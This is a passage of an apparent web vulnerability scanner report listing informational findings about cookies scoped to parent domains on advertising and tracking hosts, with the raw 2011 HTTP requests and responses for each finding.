Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_G=method->-1,ts->1304949585; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 13:59:48 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 08-May-2013 13:59:48 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

9.23. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=530739&ev=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw; 536156_4_101378=1304949601925; vf=1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 03-May-2012 14:00:04 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 08-May-2012 14:00:04 GMT; Path=/
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:04 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
9.24. http://bid.openx.net/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_27583348075&pid=dd81ea27-d6ee-482c-a1ae-66747444994b&s=468x60&f=0.6&cid=oxpv1%3A72-1331-4020-944-2650&hrid=02eea6ce6a94fccf845961f4c7a8855c-1304949600&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; p=1304805364

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=c440f793-2063-4ac9-9371-1aa8ec559ee1; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304949602; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_27583348075({"r":null});
9.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2393594&PluID=0&w=300&h=250&ord=949833763&ucm=true&ncu=$$http://adserver.adtech.de/adlink|577|2951880|0|170|AdId=6233986;BnId=1;itime=949833763;key=key1+key2+key3+key4;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001jAsGaJH702WG00003jBofaIOs07Si00001; B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001juYgaL6v07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 14:07:17 GMT
Connection: close
Content-Length: 2128

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
9.26. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4dc7f39843ecbee9&callback=_ate.ad.hrr&pub=irishtimes&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html&1syp1cb HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=1304471550.60|1304471550.1OD|1304471550.1FE; dt=X; psc=4; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Mon, 09 May 2011 14:04:52 GMT
Set-Cookie: di=1304471550.1FE|1304471550.1OD|1304471550.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 14:04:52 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08-Jun-2011 14:04:52 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Mon, 09 May 2011 14:04:51 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
9.27. http://content.pulse360.com/cgi-bin/context.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/context.cgi?id=91041742&ganid=floridatoday&gans=news&ganss=&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:28 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
set-cookie: vi_1.021=130494962871114765000106049048049; domain=.pulse360.com; path=/; expires=Tue, 08-May-2012 14:00:28 GMT
set-cookie: fc_1.2=AXzzx00; domain=.pulse360.com; path=/; expires=Mon, 16-May-2011 14:00:28 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 3662

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...
9.28. http://core.insightexpressai.com/adServer/adServerESI.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adServer/adServerESI.aspx?bannerID=178140&script=false&redir=http://core.insightexpressai.com/adserver/1pixel.gif HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074; IXAIBanners2554=175183; IXAIBannerCounter175183=1; IXAIControlCounter2554=1; lastInvite=4%2f23%2f2011+4%3a30%3a01+PM; IXAIinvited2554=true; IXAIBannerCounter174602=1; IXAIFirstHit2460=4%2f23%2f2011+4%3a31%3a40+PM; IXAIBanners2460=174602,174595; IXAIBannerCounter174595=1; IXAILastHit2460=5%2f2%2f2011+2%3a16%3a33+PM; IXAICampaignCounter2460=2; IXAIBanners2579=178140; IXAIBannerCounter178140=1; IXAIFirstHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAILastHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAICampaignCounter2579=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/7.0
Content-Length: 153
Content-Type: text/html
Location: http://core.insightexpressai.com/adserver/1pixel.gif
Set-Cookie: IXAIBanners2579=178140,178140; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178140=2; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2579=5%2f9%2f2011+9%3a51%3a44+AM; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2579=2; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:53 GMT
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:53 GMT
Connection: close
Cache-Control: no-store

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>
9.29. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.irishtimes.com%2fnewspaper%2ftheticket%2f2011%2f0506%2f1224296203710.html HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt113zye; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh13zye00y3l010k0150k; rdrlst=41c157rlklhm4000000053l0115sklkkpqq0000000d3l010m7alkkxrb0000000a3l010x1blkkpqq0000000d3l010hsplkkpqq0000000d3l010m7flkkyyl000000083l0112gdlkkyy0000000093l010morlkkxrb0000000a3l011196lkkkbe0000000j3l011195lkkpqh0000000e3l011194lkkjj40000000k3l010dlxlkb5u20000000o3l010znmlk34620000000t3l011193lkkplo0000000g3l01008slklhm4000000053l010p46lkkpqq0000000d3l011192lkkpke0000000i3l0110tylkkpku0000000h3l010p1blkb5u20000000o3l010moylkl0r5000000063l0100bvlk9pe80000000p3l0115xylk60qe0000000s3l0110poljyxb40000000v3l010e6llkl0r5000000063l0110telkd7nq0000000n3l010c9slk9pe80000000p3l0110rdlkdkly0000000l3l010mj2lkkxrb0000000a3l01159olk8fax0000000q3l010kualkkpqq0000000d3l010m0ulkl0r5000000063l010m45lkl0r5000000063l010m0plkkxrb0000000a3l010m40lkkxrb0000000a3l010mjelkkxrb0000000a3l0112qnlkkplt0000000f3l01167blkl0r5000000063l010bo8lkb5u20000000o3l010mjjlkl0r5000000063l011672lkkxrb0000000a3l010lw5lkb5u20000000o3l010ycrlkncow000000043l011203lkb5u20000000o3l01137rlkkpqq0000000d3l011204lkkyy0000000093l010o0vlkkpqx0000000c3l010z2ilkkxrb0000000a3l010ni1lkb5u20000000o3l01; sglst=20q0sc80lkb5u209jqc0063e000j00500ag2lkd7nq0kdwd00n3l010k0150kc81lkkpke0000000i3l010k0150ia6slkkpke0000000i3l010k0150i9rslkkpke00s1q00i3l010k0150iam5lkkxr8002zw00b3l010k0150b0kllklhm4000000053l010k015059q5lkb5u20abs200o3l010k0150kdgflkkpke00s1q00i3l010k0150i0t7ljyxb40yo8z00v3l010k0150kbo0lkb5u209jqc00o3l010k0150kbo1lkkyy000io40093l010k01509aoplkb5u209jqc0063e000j00500d86lklhm4000000053l010k01505942lkb5u20abs200o3l010k0150k8ndlkb5u20abs200o3l010k0150k719lkb5u209jqc0063e000j0050071alkkpke00s1q00i3l010k0150i56blkb5u20abs200o3l010k0150kasulkb5u209jqc0063e000j00500dgilkb5u209jqc0063e000j00500c5rlkov6e000000033l010k015034wclkb5u209jqc0063e000j005008eklkkpke00s1q00i3l010k0150i5mrlkb5u20abs200o3l010k0150kbwjlkkyy000io40093l010k01509; vstcnt=417k010r134exp6103210e24tc6l103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24tmhw103210924n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e24cnyl103210g24styu10321092451gt10pj10e24fj52103210924o2lt103210a24nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b24hqyp103210i24kd6k103210c23l4f103210a2

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt11407xxzt1tr37xzt1tr37xzt11407xxzt113zye; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh1407x00z3l020k0250l; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=41w157rlklhm4000000063l02157olkxltm000000013l0115holkxltm000000013l0115sklkkpqq0000000e3l020m7alkkxrb0000000b3l020x1blkkpqq0000000e3l020hsplkkpqq0000000e3l020m7flkkyyl000000093l0212gdlkkyy00000000a3l02148ilkxltm000000013l010morlkkxrb0000000b3l0214k6lkxltm000000013l0114rwlkxltm000000013l011196lkkkbe0000000k3l0214khlkxltm000000013l011195lkkpqh0000000f3l021194lkkjj40000000l3l020dlxlkb5u20000000p3l0216nulkxltm000000013l0114hplkxltm000000013l010znmlk34620000000u3l0214hclkxltm000000013l011193lkkplo0000000h3l021192lkkpke0000000j3l020p46lkkpqq0000000e3l02008slklhm4000000063l0216oilkxltm000000013l010moylkl0r5000000073l020p1blkb5u20000000p3l0210tylkkpku0000000i3l0200bvlk9pe80000000q3l0215xylk60qe0000000t3l0210poljyxb40000000w3l020e6llkl0r5000000073l0210telkd7nq0000000o3l020c9slk9pe80000000q3l0210rdlkdkly0000000m3l020mj2lkkxrb0000000b3l0214qllkxltm000000013l01159olk8fax0000000r3l0215halkxltm000000013l010kualkkpqq0000000e3l02163plkxltm000000013l010m0ulkl0r5000000073l020m45lkl0r5000000073l020m0plkkxrb0000000b3l020m40lkkxrb0000000b3l020mjelkkxrb0000000b3l0214xnlkxltm000000013l0112qnlkkplt0000000g3l02167blkl0r5000000073l020bo8lkb5u20000000p3l020mjjlkl0r5000000073l021672lkkxrb0000000b3l020lw5lkb5u20000000p3l020ycrlkncow000000053l0215k9lkxltm000000013l0116atlkxltm000000013l011203lkb5u20000000p3l02163clkxltm000000013l01137rlkkpqq0000000e3l021204lkkyy00000000a3l020o0vlkkpqx0000000d3l0214ozlkxltm000000013l0114j7lkxltm000000013l0114bzlkxltm000000013l010z2ilkkxrb0000000b3l020ni1lkb5u20000000p3l02; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: sglst=2280sbpelkxltm000000013l010k01501dsnlkxltm000000013l010k01501arllkxltm000000013l010k01501cg5lkxltm000000013l010k015019rslkkpke0cw9800j3l020k0250jam5lkkxr8002zw00c3l020k0250ccd4lkxltm000000013l010k01501crglkxltm000000013l010k01501cnolkxltm000000013l010k01501abelkxltm000000013l010k01501dd8lkxltm000000013l010k01501cy2lkxltm000000013l010k01501aoplkb5u209jqc0063e000j00500cnxlkxltm000000013l010k01501bq3lkxltm000000013l010k01501aoilkxltm000000013l010k01501bvplkxltm000000013l010k01501942lkb5u20mfzk00o3l000k005009ullkxltm000000013l010k015018ndlkb5u20mfzk00o3l000k00500bvclkxltm000000013l010k01501c5flkxltm000000013l010k0150156blkb5u20mfzk00o3l000k00500bjqlkxltm000000013l010k01501awklkxltm000000013l010k01501asulkb5u209jqc0063e000j00500crplkxltm000000013l010k01501asqlkxltm000000013l010k01501c5rlkov6e000000043l020k02504aw8lkxltm000000013l010k01501c60lkxltm000000013l010k01501dc4lkxltm000000013l010k01501d26lkxltm000000013l010k01501dnjlkxltm000000013l010k01501brilkxltm000000013l010k01501cbclkxltm000000013l010k01501c85lkxltm000000013l010k01501csslkxltm000000013l010k01501c80lkb5u209jqc0063e000j00500ag2lkd7nq0ke5w00o3l020k0250lc1elkxltm000000013l010k01501c81lkkpke0cw9800i3l000k005009grlkxltm000000013l010k01501c8flkxltm000000013l010k01501a6slkkpke0cw9800i3l000k00500dnalkxltm000000013l010k015019z6lkxltm000000013l010k01501dbtlkxltm000000013l010k015019q4lkxltm000000013l010k015010kllklhm40c47i0053l000k00500dyllkxltm000000013l010k01501b3zlkxltm000000013l010k015019q5lkb5u20mfzk00o3l000k005009mjlkxltm000000013l010k01501dgflkkpke0cw9800j3l020k0250j0t7ljyxb40yoii00w3l020k0250lbo0lkb5u20mfzk00p3l020k0250lbo1lkkyy00cmvm0093l000k005009pglkxltm000000013l010k01501d86lklhm40c47i0053l000k00500cwalkxltm000000013l010k01501dqllkxltm000000013l010k01501d84lkxltm000000013l010k01501dz3lkxltm000000013l010k01501cm6lkxltm000000013l010k01501cxdlkxltm000000013l010k01501719lkb5u20mfzk0073l010k0150271alkkpke0cw9800i3l000k00500ctplkxltm000000013l010k01501cc3lkxltm000000013l010k01501dgilkb5u209jqc0063e000j00500cthlkxltm000000013l010k015014wclkb5u20mfzk0073l010k01502a0ulkxltm000000013l010k015015mrlkb5u20mfzk00o3l000k005008eklkkpke0cw9800i3l000k00500arilkxltm000000013l010k01501cbplkxltm000000013l010k01501bwjlkkyy00cmvm00a3l020k0250a9gelkxltm000000013l010k01501; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: vstcnt=417k010r144exp6103210e24tc6l103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924f69z103210f24pq44103210a24n86o103210d24eflo218e104203210724eyja103210e24na8i103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e2451gt10pj10e24styu103210924cnyl103210g24o2lt103210a24fj52103210924nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c24hqyp103210i2; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?t=2&id=1287355&id=1287330&id=1280693&id=1277220&id=1277245&id=1266387&id=1265430&id=1265419&id=1264304&id=1261148&id=1259050&id=1259015&id=1258217&id=1256870&id=1256778&id=1256768&id=1256837&id=1256878&id=1255378&id=1256592
Content-Length: 0
Date: Mon, 09 May 2011 14:05:46 GMT

9.30. http://cw-m.d.chango.com/m/cw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cw-m.d.chango.com
Path:   /m/cw

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cw HTTP/1.1
Host: cw-m.d.chango.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_cw=1; _i_admeld=1; _i_ox=1; _i_st=1; _i_pm=1; _i_tm=1; _i_ab=1; _i_sl=1; _i_gid=1; _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://bh.contextweb.com/bh/rtset?do=add&ev=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe&pid=535495&rurl=http%3A//d.chango.com/m/s/contextweb&x=2011-06-23
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Thu, 06 May 2021 14:00:03 GMT; Path=/
Set-Cookie: _i_cw=1; Domain=chango.com; expires=Thu, 23 Jun 2011 14:00:03 GMT; Path=/
Connection: close

9.31. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2931142961646634775  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
